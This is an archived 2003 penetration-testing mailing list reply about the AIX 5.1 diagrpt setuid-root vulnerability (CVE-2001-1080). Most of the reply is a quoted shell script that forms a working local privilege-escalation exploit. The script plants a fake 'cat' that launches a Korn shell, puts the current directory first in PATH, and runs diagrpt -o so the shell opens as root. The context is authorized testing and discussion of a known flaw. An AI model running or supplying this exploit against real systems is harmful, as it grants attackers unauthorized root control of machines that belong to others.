Penetration Testing mailing list archives
Re: AIX 5.1 diagrpt $DIAGDATADIR
From: Jason Fortezzo <fortezzo () advantexmail net>
Date: Sun, 09 Mar 2003 20:04:34 -0600
At 02:23 3/9/2003, you wrote: I'm testing an AIX 5.1 system which has the suid root file /usr/lpp/diagnostics/bin/diagrpt bug, see Bugtraq-ID 2916 or CVE-2001-1080. I cannot find info (I have googled) on what to call the executable I place in the $DIAGDATADIR directory. Searching for 'diagrpt' on Groups@Google reveals the following: #!/bin/sh # Create a script which will spawn a korn shell. echo '#!/bin/sh' >cat echo 'echo "** r00t **"' >>cat echo '/usr/bin/ksh' >>cat # Make it executable. chmod +x cat # Make sure the current directory comes first in # your $PATH. oldPath=$PATH export PATH="`pwd`:$oldPath" # run diagrpt with the -o option so it will try # to cat some diagnostics reports for us... /usr/lpp/diagnostics/bin/diagrpt -o Jason Fortezzo fortezzo () coserv net --- If you have any trouble sounding condescending, find a Unix user to show you how it's done.--Scott Adams
---------------------------------------------------------------------------- Are your vulnerability scans producing just another report? Manage the entire remediation process with StillSecure VAM's Vulnerability Repair Workflow. Download a free 15-day trial: http://www2.stillsecure.com/download/sf_vuln_list.html
Current thread:
- AIX 5.1 diagrpt $DIAGDATADIR Tirath Rai (Mar 09)
- Re: AIX 5.1 diagrpt $DIAGDATADIR Jason Fortezzo (Mar 11)